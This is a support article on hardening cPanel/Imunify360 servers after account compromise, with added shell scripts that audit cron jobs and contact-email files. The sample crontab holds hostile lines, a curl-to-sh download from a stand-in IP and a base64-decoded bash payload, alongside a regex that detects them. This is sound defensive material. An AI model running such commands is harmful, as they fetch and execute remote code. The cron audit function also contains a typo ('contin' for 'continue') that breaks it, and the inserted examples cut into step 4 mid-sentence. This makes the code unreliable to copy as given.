Issue
Malware Remedy Team investigations point to the likelihood of accounts being compromised.
Environment
- cPanel/WHM
- Imunify360
- Supported OS
Solution
The following guide provides recommendations to tighten the security posture of a server running cPanel and Imunify360. If your cPanel server is reinfected frequently, we suggest doing the following:
1) If you are using Imunify360, keep the following features enabled:
- Set the Proactive Defense feature to "Kill" mode.
- Enable the real-time scanning options in Imunify360.
- Make sure the WAF layer is fully functional.
- Make sure the Malware Database Scanner is active.
- Make sure the cron task scanner is enabled.
- Enable cPanel compromised accounts protection.
- Enable the cPanel upload scanner.
2) Periodically check the scheduled jobs (cron jobs) of all accounts, including those of root.
3) Check that all cPanel API tokens are ones you know about.
4) Update WHM, as one of the possible ways to gain access is via the contact email files:
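As an added example (not part of the original article), the following shell snippet illustrates the kind of cron review step 2 asks for: it filters a crontab for patterns commonly seen in malicious scheduled jobs (download-and-pipe-to-shell, base64-decoded payloads, execution out of /tmp or /dev/shm, inline script interpreters) and prints only the matching lines. The sample crontab is constructed for the demonstration; the paths used by `audit_server_crontabs` (/var/spool/cron, /etc/crontab, /etc/cron.d) are the standard locations on RHEL-based systems such as the ones cPanel supports.

```shell
# Constructed sample crontab; not taken from a real server.
# The two lines with curl|sh and base64 -d stand in for typical malicious jobs.
SAMPLE_CRON='# constructed sample crontab
0 3 * * * /usr/local/cpanel/scripts/upcp --cron
*/5 * * * * curl -s http://198.51.100.7/x.sh | sh
@reboot echo aGk= | base64 -d | bash
15 2 * * 0 /usr/local/bin/backup.sh'

# Read crontab text on stdin, drop comments and blank lines, and print only
# entries that match indicators worth a manual look. Exits 0 even with no hits.
flag_suspicious_cron() {
  grep -vE '^[[:space:]]*(#|$)' \
    | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/(tcp|shm)|/tmp/[^[:space:]]+|(perl|python[0-9.]*)[[:space:]]+-[ec][[:space:]]' \
    || true
}

# Count the flagged entries in the crontab text given on stdin.
count_suspicious_cron() {
  flag_suspicious_cron | grep -c . || true
}

# Walk every crontab location on a live server and report flagged entries
# together with the file they came from. Requires root; not run by the demo.
audit_server_crontabs() {
  for f in /var/spool/cron/* /etc/crontab /etc/cron.d/*; do
    [ -f "$f" ] || contin
    flag_suspicious_cron < "$f" | sed "s|^|$f: |"
  done
}

# Demo on the constructed sample: prints the curl|sh and base64 lines only.
printf '%s\n' "$SAMPLE_CRON" | flag_suspicious_cron
```

On a real server, run `audit_server_crontabs` as root and review each reported line by hand; the pattern list is a starting point, not a verdict, and a legitimate job can match it.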
If the "password recovery" function is enabled on the server, an attacker can place their own email address in the files
/home/user/.contactemail
and
/home/user/.cpanel/contactinfo
in order to receive a password reset link at that address.
We suggest checking the mentioned files and removing any untrusted email addresses.
With the latest changes on the cPanel side, this method is no longer relevant: those files may still be present, but the system no longer uses them.
All contact emails are now stored in the `/var/cpanel/users/$username` file. This was done for security reasons: attackers who gain access to an account can no longer change the `.contactemail` file and request that a password reset be sent to them. These changes were introduced in WHM starting with version 106:
https://docs.cpanel.net/changelogs/106-change-log/
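As an added example (not from the original article or from cPanel), the following shell functions show how to review the contact addresses described in step 4 against a list of domains you trust. The sample user file is constructed; it assumes the `CONTACTEMAIL` / `CONTACTEMAIL2` key names used in `/var/cpanel/users/$username`, and `legacy_contact_files` only lists the old per-home files so they can be inspected.

```shell
# Constructed excerpt in the style of /var/cpanel/users/<user>; not a real account.
SAMPLE_USER_FILE='USER=exampleuser
CONTACTEMAIL=owner@example.com
CONTACTEMAIL2=unknown@mail.example.net
DEMO=0'

# Print every contact address (CONTACTEMAIL, CONTACTEMAIL2, ...) found in a
# cPanel user file given on stdin, one per line.
contact_emails() {
  sed -n -E 's/^CONTACTEMAIL[0-9]*=[[:space:]]*([^[:space:]]+).*$/\1/p'
}

# Print the contact addresses whose domain is not in the space-separated
# list of trusted domains given as $1. Input: user file on stdin.
untrusted_contact_emails() {
  trusted="$1"
  contact_emails | while read -r addr; do
    domain="${addr##*@}"
    case " $trusted " in
      *" $domain "*) ;;                 # trusted domain: nothing to report
      *) printf '%s\n' "$addr" ;;       # anything else deserves a look
    esac
  done
}

# Check every account on a live server against the trusted-domain list.
# Requires root; not run by the demo.
audit_contact_emails() {
  for f in /var/cpanel/users/*; do
    [ -f "$f" ] || continue
    untrusted_contact_emails "$1" < "$f" | sed "s|^|$(basename "$f"): |"
  done
}

# List the legacy per-home contact files that still exist, so they can be
# reviewed and cleaned up even though current WHM no longer reads them.
legacy_contact_files() {
  for f in /home/*/.contactemail /home/*/.cpanel/contactinfo; do
    [ -f "$f" ] && printf '%s\n' "$f"
  done
  return 0
}

# Demo on the constructed file: prints only unknown@mail.example.net.
printf '%s\n' "$SAMPLE_USER_FILE" | untrusted_contact_emails "example.com"
```

Run `audit_contact_emails "yourdomain.example"` as root to get a per-account list of addresses to verify with the account owner before removing them.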
5) Change the password for root and for the compromised accounts:
- Home » Account Information » List Accounts
Select the cPanel account; next to it, expand the settings with "+", choose "Change Password" and enter the new password.
If you have asked customers to change the passwords of the affected accounts and need to verify whether they have done so, check the last password change date with:
chage -l $user | grep 'Last password change'
6) Enable 2FA for cPanel users as per the article: